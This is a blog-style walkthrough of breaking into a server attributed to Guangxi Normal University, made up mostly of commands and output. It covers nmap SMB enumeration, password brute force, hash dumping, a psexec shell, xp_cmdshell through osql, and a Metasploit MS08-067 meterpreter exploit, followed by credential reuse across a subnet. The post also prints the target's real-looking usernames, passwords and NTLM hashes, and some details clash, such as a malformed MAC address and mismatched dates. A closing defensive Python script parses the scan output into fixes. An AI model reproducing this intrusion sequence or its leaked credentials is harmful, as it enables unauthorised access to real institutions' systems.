Breaking into Guangxi Normal University with nmap+msf

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames and the captured hash against the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded: a simple msf+nmap attack.

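As an added example that is not part of the original post: a Python parser for the nmap NSE output format shown in the sessions above (smb-enum-shares, smb-brute, smb-check-vulns) that turns the same findings into a prioritised remediation list when the scan is run against one's own hosts. The sample output, the name host-a and the address 192.0.2.10 are constructed.

```python
import re
# Constructed sample in the nmap normal-output format shown above; "host-a" and 192.0.2.10 are placeholders.
SAMPLE = """\
Nmap scan report for host-a (192.0.2.10)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""
REPORT_RE = re.compile(r"^Nmap scan report for .*?\(?(\d+\.\d+\.\d+\.\d+)\)?\s*$")

def parse_host_scripts(text):  # -> {ip: {script_name: [result lines]}}
    hosts, ip, script = {}, None, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:                                   # a new host block starts here
            ip, script = m.group(1), None
            hosts[ip] = {}
        elif ip and line.startswith("|"):      # script output carries a "|" or "|_" prefix
            body = line.lstrip("|_").strip()
            s = re.match(r"(smb-[\w-]+):$", body)
            if s:                               # script header such as "smb-brute:"
                script = s.group(1)
                hosts[ip][script] = []
            elif script:
                hosts[ip][script].append(body)
    return hosts

def findings(hosts):  # -> [(ip, severity, message)] ready for a ticket queue
    out = []
    for ip, scripts in hosts.items():
        share = None
        for item in scripts.get("smb-enum-shares", []):
            if not item.startswith("Anonymous access:"):
                share = item                    # a share-name line precedes its access line
                continue
            access = item.split(":", 1)[1].strip()
            if access != "<none>":              # a null session can reach the share
                out.append((ip, "medium", f"anonymous {access} on {share}"))
        for item in scripts.get("smb-brute", []):
            user, _, rest = item.partition(":")
            kind = "blank" if rest.split(" =>", 1)[0] == "<blank>" else "weak"
            out.append((ip, "critical" if kind == "blank" else "high", f"login as {user} with {kind} password"))
        for item in scripts.get("smb-check-vulns", []):
            name, _, state = item.rpartition(": ")
            if state in ("VULNERABLE", "LIKELY VULNERABLE"):
                out.append((ip, "critical", f"unpatched {name}"))
    return out
```

Feed it the saved normal output of a scan (`nmap -oN`) and sort the tuples by severity to get the fix order: blank administrator passwords and the missing MS08-067 patch first, anonymous IPC$ access after.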